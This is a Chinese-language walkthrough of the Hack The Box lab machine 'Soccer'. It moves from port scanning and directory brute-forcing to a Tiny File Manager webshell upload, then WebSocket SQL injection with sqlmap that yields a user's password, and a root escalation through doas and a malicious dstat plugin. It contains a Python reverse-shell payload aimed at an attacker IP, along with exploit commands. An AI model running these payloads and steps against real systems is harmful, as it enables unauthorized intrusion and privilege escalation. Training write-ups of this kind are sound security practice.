Soccer 靶机

信息收集

┌──(i3eg1nner㉿minilite)-[~/Downloads/Soccer]
└─$ sudo nmap --min-rate 10000 -p- 10.10.11.194
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-06 09:22 EDT
Warning: 10.10.11.194 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.194
Host is up (0.058s latency).
Not shown: 64759 closed tcp ports (reset), 773 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9091/tcp open  xmltec-xmlmail

Nmap done: 1 IP address (1 host up) scanned in 28.92 seconds

┌──(i3eg1nner㉿minilite)-[~/Downloads/Soccer]
└─$ sudo nmap -sT -sV -sC -p22,80,9091  10.10.11.194
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-06 09:24 EDT
Nmap scan report for 10.10.11.194
Host is up (0.0038s latency).

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 ad0d84a3fdcc98a478fef94915dae16d (RSA)
|   256 dfd6a39f68269dfc7c6a0c29e961f00c (ECDSA)
|_  256 5797565def793c2fcbdb35fff17c615c (ED25519)
80/tcp   open  http            nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://soccer.htb/
9091/tcp open  xmltec-xmlmail?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, SSLSessionReq, drda, informix:
|     HTTP/1.1 400 Bad Request
|     Connection: close
|   GetRequest:
|     HTTP/1.1 404 Not Found
|     Content-Security-Policy: default-src 'none'
|     X-Content-Type-Options: nosniff
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 139
|     Date: Tue, 06 Jun 2023 13:24:56 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error</title>
|     </head>
|     <body>
|     <pre>Cannot GET /</pre>
|     </body>
|     </html>
|   HTTPOptions, RTSPRequest:
|     HTTP/1.1 404 Not Found
|     Content-Security-Policy: default-src 'none'
|     X-Content-Type-Options: nosniff
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 143
|     Date: Tue, 06 Jun 2023 13:24:56 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error</title>
|     </head>
|     <body>
|     <pre>Cannot OPTIONS /</pre>
|     </body>
|_    </html>
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.61 seconds

┌──(i3eg1nner㉿minilite)-[~/Downloads/Soccer]
└─$ sudo nmap --script=vuln -p22,80,9091 10.10.11.194
[sudo] password for i3eg1nner:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-06 09:49 EDT
Nmap scan report for soccer.htb (10.10.11.194)
Host is up (0.0039s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-vuln-cve2011-3192:
|   VULNERABLE:
|   Apache byterange filter DoS
|     State: VULNERABLE
|     IDs:  BID:49303  CVE:CVE-2011-3192
|       The Apache web server is vulnerable to a denial of service attack when numerous
|       overlapping byte ranges are requested.
|     Disclosure date: 2011-08-19
|     References:
|       https://seclists.org/fulldisclosure/2011/Aug/175
|       https://www.securityfocus.com/bid/49303
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|_      https://www.tenable.com/plugins/nessus/55976
|_http-csrf: Couldn't find any CSRF vulnerabilities.
9091/tcp open  xmltec-xmlmail

Nmap done: 1 IP address (1 host up) scanned in 76.65 seconds

整理一下现在得到的信息：三个开放的端口，大概率 Linux 操作系统，没有明显的漏洞

Web 界面访问

访问的时候自动跳转到一个网址 soccer.htb，那我们就在/etc/hosts 文件中建立映射，这样就能正常访问界面了，查看网页源代码+随意点点点+基础的信息收集，都没得到什么信息。目录爆破吧

┌──(i3eg1nner㉿minilite)-[~/Downloads/Soccer]
└─$ sudo gobuster dir -u http://soccer.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://soccer.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/06/06 09:55:03 Starting gobuster in directory enumeration mode
===============================================================
/tiny                 (Status: 301) [Size: 178] [--> http://soccer.htb/tiny/]
Progress: 219896 / 220561 (99.70%)
===============================================================
2023/06/06 09:56:35 Finished
===============================================================

Tiny File Manager 2.4.3 漏洞

访问一下，是一个叫做 tiny file manager 的文件管理系统，查看网页源代码的时候看到了版本号 2.4.3，谷歌一下

GitHub 中得到了两个脚本，sh 脚本跑的时候出了问题，python 脚本能运行但是没有达到预期的效果（网站限制了写权限的问题）。值得注意的是，使用说明中提到了需要管理员的账户和密码，给的例子里的账户名和密码是默认用户和密码，尝试之后发现确实是默认密码登录。使用脚本跑的时候有如下报错：

┌──(i3eg1nner㉿minilite)-[~/Downloads/Soccer]
└─$ python tiny_file_manager_exploit.py  http://soccer.htb/tiny/tinyfilemanager.php admin "admin@123"


CVE-2021-45010: Tiny File Manager <= 2.4.3 Authenticated RCE  Exploit.

Vulnerability discovered by Febin

Exploit Author: FEBIN

[+] Leak in the webroot direcory path to upload shell.
[+] WEBROOT found:  /var/www/html/tiny
[+] Trying to upload pwn_1480535420723339776.php to /var/www/html/tiny directory...
{"status":"error","info":"The specified folder for upload isn't writeable."}
[-] No Success response. Files does not seem to be uploaded successfully.
Exiting...
Exited.

观察地址结构似乎没什么问题，看了脚本里上传文件的内容是一句话木马，那就手动上传试试吧，上传提示 tiny 目录没有上传权限，那就试试下一级 upload 目录，上传成功

http://soccer.htb/tiny/uploads/<your-shell-name>

Getshell

提前开启监听端口，访问以上路径，即可反弹 shell

┌──(i3eg1nner㉿minilite)-[~/Downloads/Soccer]
└─$ sudo nc -lvnp 1234
[sudo] password for i3eg1nner:
listening on [any] 1234 ...
connect to [10.10.14.145] from (UNKNOWN) [10.10.11.194] 34534
Linux soccer 5.4.0-135-generic #152-Ubuntu SMP Wed Nov 23 20:19:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
 15:41:04 up  4:06,  0 users,  load average: 0.00, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can\'t access tty; job control turned off
$ whoami
www-data
$ uname -a
Linux soccer 5.4.0-135-generic #152-Ubuntu SMP Wed Nov 23 20:19:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:5e:b1 brd ff:ff:ff:ff:ff:ff
    inet 10.10.11.194/23 brd 10.10.11.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:feb9:5eb1/64 scope link
       valid_lft forever preferred_lft forever
$ which python
$ which python2
$ which python3
/usr/bin/python3
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@soccer:/$ sudo -l
sudo -l
[sudo] password for www-data:

Sorry, try again.
[sudo] password for www-data: admin@123

Sorry, try again.
[sudo] password for www-data: 12345

sudo: 3 incorrect password attempts

进行信息收集，在/home/player 目录下发现了 user.txt 但是没有访问权限，定时任务、用户目录、环境变量，ps中都没有可以利用的点，s 权限中发现一个特殊文件doas

www-data@soccer:/$ find / -type f -perm -u=s 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
/usr/local/bin/doas
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/at
/snap/snapd/17883/usr/lib/snapd/snap-confine
/snap/core20/1695/usr/bin/chfn
/snap/core20/1695/usr/bin/chsh
/snap/core20/1695/usr/bin/gpasswd
/snap/core20/1695/usr/bin/mount
/snap/core20/1695/usr/bin/newgrp
/snap/core20/1695/usr/bin/passwd
/snap/core20/1695/usr/bin/su
/snap/core20/1695/usr/bin/sudo
/snap/core20/1695/usr/bin/umount
/snap/core20/1695/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1695/usr/lib/openssh/ssh-keysign

谷歌发现

www-data@soccer:/$ cat /etc/doas.conf
cat /etc/doas.conf
cat: /etc/doas.conf: No such file or directory
www-data@soccer:/$ doas -h
doas -h
doas: invalid option -- 'h'
usage: doas [-nSs] [-a style] [-C config] [-u user] command [args]
www-data@soccer:/$ find / -name doas.conf 2>/dev/null
find / -name doas.conf 2>/dev/null
/usr/local/etc/doas.conf
www-data@soccer:/$ cat /usr/local/etc/doas.conf
cat /usr/local/etc/doas.conf
permit nopass player as root cmd /usr/bin/dstat

conf 文件给出了提示，player 用户可以在不使用密码的情况下以 root 身份运行/usr/bin/dstat，那接下来的问题就是如何获取 player 用户了。

子域名信息

一开始觉得可能是密码写在了配置文件里，但是重复信息收集均无果，因此看了眼 WP。这里的操作还是第一次见，去查看 /etc/nginx/sites-enabled 。实际上也可以从 netstat -lntp 出发，先看看有哪些本地 TCP 端口开放

发现了一些开放，但是没有权限查看 PID 的端口，因此尝试进入 nginx 目录看看

www-data@soccer:/etc/nginx$ cd sites-enabled
cd sites-enabled
www-data@soccer:/etc/nginx/sites-enabled$ ls -liah
ls -liah
total 8.0K
259074 drwxr-xr-x 2 root root 4.0K Dec  1  2022 .
259060 drwxr-xr-x 8 root root 4.0K Nov 17  2022 ..
256059 lrwxrwxrwx 1 root root   34 Nov 17  2022 default -> /etc/nginx/sites-available/default
262572 lrwxrwxrwx 1 root root   41 Nov 17  2022 soc-player.htb -> /etc/nginx/sites-available/soc-player.htb
www-data@soccer:/etc/nginx/sites-enabled$ cat /etc/nginx/sites-available/soc-player.htb
<bled$ cat /etc/nginx/sites-available/soc-player.htb
server {
        listen 80;
        listen [::]:80;

        server_name soc-player.soccer.htb;

        root /root/app/views;

        location / {
                proxy_pass http://localhost:3000;
                proxy_http_version 1.1;
                proxy_set_header Upgrade $http_upgrade;
                proxy_set_header Connection 'upgrade';
                proxy_set_header Host $host;
                proxy_cache_bypass $http_upgrade;
        }

}

在这里可以获取到子域名信息，我们再次修改 hosts 文件，添加子域名和 IP 的映射，访问子域名发现，主要界面和主域名是一样的，但是增加了登录和注册的选项，尝试先注册再登录（可以顺便测一下 SQL 注入），登陆后发现只有一个搜索框，存在 SQL 注入的可能性比较高。如果输入自己的票据 id 会提示存在，随便输入会提示不存在，尝试 and 1=1 和 and 1=0，发现语句被执行，因此可以确定存在 SQL 注入。

这里还是要先看下网页源代码，重要收获隐藏在源代码中，当然如果你使用的是 burp suite 那么可以在 target 中看到 sitemap 中有个 9091 的端口。

response 中提示升级到了 websocket，回到 proxy 选项，其中存在 websocket 选项卡，可以看到我们的查询内容被写在其中

var ws = new WebSocket("ws://soc-player.soccer.htb:9091");
window.onload = function () {

var btn = document.getElementById('btn');
var input = document.getElementById('id');

ws.onopen = function (e) {
    console.log('connected to the server')
}
input.addEventListener('keypress', (e) => {
    keyOne(e)
});

function keyOne(e) {
    e.stopPropagation();
    if (e.keyCode === 13) {
        e.preventDefault();
        sendText();
    }
}

function sendText() {
    var msg = input.value;
    if (msg.length > 0) {
        ws.send(JSON.stringify({
            "id": msg
        }))
    }
    else append("????????")
}
}

ws.onmessage = function (e) {
append(e.data)
}

function append(msg) {
let p = document.querySelector("p");
// let randomColor = '#' + Math.floor(Math.random() * 16777215).toString(16);
// p.style.color = randomColor;
p.textContent = msg
}

其中嵌入了这样的代码，我们需要借助于搜索引擎考虑如何将其转换成更方便的利用

可以在第一个网页中找到我们所需要的代码，修改其中的关键代码

SQLMap 爆破

websocket 脚本与 SQLMap 联动

本地运行此 python 文件，同时另起一个 terminal 来执行 sqlmap

┌──(i3eg1nner㉿minilite)-[~]
└─$ sqlmap -u "http://localhost:8081/?id=1" -p "id" --tables
        ___
       __H__
 ___ ___[\"]_____ ___ ___  {1.7.2#stable}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:43:22 /2023-06-06/

[12:43:22] [INFO] resuming back-end DBMS 'mysql'
[12:43:22] [INFO] testing connection to the target URL
[12:43:22] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.11.2')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 8273 FROM (SELECT(SLEEP(5)))cpyj)
---
[12:43:22] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[12:43:22] [INFO] fetching database names
[12:43:22] [INFO] fetching number of databases
[12:43:22] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[12:43:30] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
5
[12:43:36] [INFO] retrieved:
[12:43:41] [INFO] adjusting time delay to 1 second due to good response times
mysql
[12:43:56] [INFO] retrieved: information_schema
[12:44:57] [INFO] retrieved: performance_schema
[12:45:55] [INFO] retrieved: sys
[12:46:05] [INFO] retrieved: soccer_db
[12:46:36] [INFO] fetching tables for databases: 'information_schema, mysql, performance_schema, soccer_db, sys'
[12:46:36] [INFO] fetching number of tables for database 'information_schema'
[12:46:36] [INFO] retrieved: 79
[12:46:41] [INFO] retrieved: ADMINISTRABLE_ROLE_AUTHORIZATIONS
[12:48:28] [INFO] retrieved: AP^C

这里实在太慢了，因此直接去看了 WP

┌──(i3eg1nner㉿minilite)-[~]
└─$ sqlmap -u "http://localhost:8081/?id=1" -p "id" -T accounts --columns
        ___
       __H__
 ___ ___[\"]_____ ___ ___  {1.7.2#stable}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:51:24 /2023-06-06/

[12:51:25] [INFO] resuming back-end DBMS 'mysql'
[12:51:25] [INFO] testing connection to the target URL
[12:51:55] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[12:51:55] [WARNING] if the problem persists please check that the provided target URL is reachable. In case that it is, you can try to rerun with switch '--random-agent' and/or proxy switches ('--proxy', '--proxy-file'...)
[12:51:55] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.11.2')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 8273 FROM (SELECT(SLEEP(5)))cpyj)
---
[12:51:55] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[12:51:55] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[12:51:55] [INFO] fetching current database
[12:51:55] [INFO] resumed: soccer_db
[12:51:55] [INFO] fetching columns for table 'accounts' in database 'soccer_db'
[12:51:55] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[12:52:02] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
4
[12:52:02] [INFO] retrieved:
[12:52:12] [INFO] adjusting time delay to 1 second due to good response times
email
[12:52:24] [INFO] retrieved: varchar(40)
[12:53:00] [INFO] retrieved: id
[12:53:07] [INFO] retrieved: int
[12:53:18] [INFO] retrieved: password
[12:53:47] [INFO] retrieved: va^C

再次去看了 WP，直接看来用户名和密码，回头还是得进一步记一下 sqlmap 的参数，得到了

Username: player
Password: PlayerOftheMatch2022

接下来尝试 ssh 登录，成功

直接使用 SQLMap 进行 websocket 类型的注入

实际上 SQLMap 可以直接进行 websocket 类型的注入，利用我们在 BurpSuite 中拿到的信息来进行操作，值得注意的是这里的 id 如果随便给，那么会导致 SQLMap 注入只能获取到基于时间的盲注，这也是之前速度为什么那么慢的原因

sqlmap -u ws://soc-player.soccer.htb:9091 --data='{"id":"4354"}' --batch

得到的返回，确实存在注入，包括布尔型和时间盲注

接下来使用 --current-db 来获取数据库名字，后续就是经典操作，因为是复习回顾别人视频里的内容来查漏补缺，所以不再赘述特别详尽的操作

提权

提权的话，前面已经有了思路，也就是 doas 文件以 root 权限运行 dstat。dstat 是一个监控系统服务的工具，类似于 top -n。借助于谷歌 dstat，有这样的收获，不过图中给的命令运行会出问题，感觉可能是 HTB 做了限制，不然接下来的每个人在搜索 s 权限文件的时候，就能直接获得 root 权限了，这里使用反弹 shell 的方法成功实现了提权。Doas Privilege Escalation | Exploit Notes (hdks.org)

再看一下 conf 文件中的提示

www-data@soccer:/$ cat /usr/local/etc/doas.conf
cat /usr/local/etc/doas.conf
permit nopass player as root cmd /usr/bin/dstat

新建 dstat_exploit.py 文件位于/usr/local/share/dstat 中。dstat 命令的插件主要在一下两个位置保存： /usr/share/dstat/ /usr/local/share/dstat/

import socket,subprocess,os;  
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);  
s.connect((“<your-IP>”,2929));  
  
os.dup2(s.fileno(),0);  
os.dup2(s.fileno(),1);  
os.dup2(s.fileno(),2);  
  
import pty; pty.spawn(“/bin/sh”)

执行命令

player@soccer:/usr/local/share/dstat$ doas -u root /usr/bin/dstat --exploit
/usr/bin/dstat:2619: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
  import imp

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nc -lvnp 1234
[sudo] password for i3eg1nner:
listening on [any] 1234 ...
connect to [10.10.14.145] from (UNKNOWN) [10.10.11.194] 59294
# whoami
whoami
root
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
cat /root/root.txt

# cat /home/player/user.txt
cat /home/player/user.txt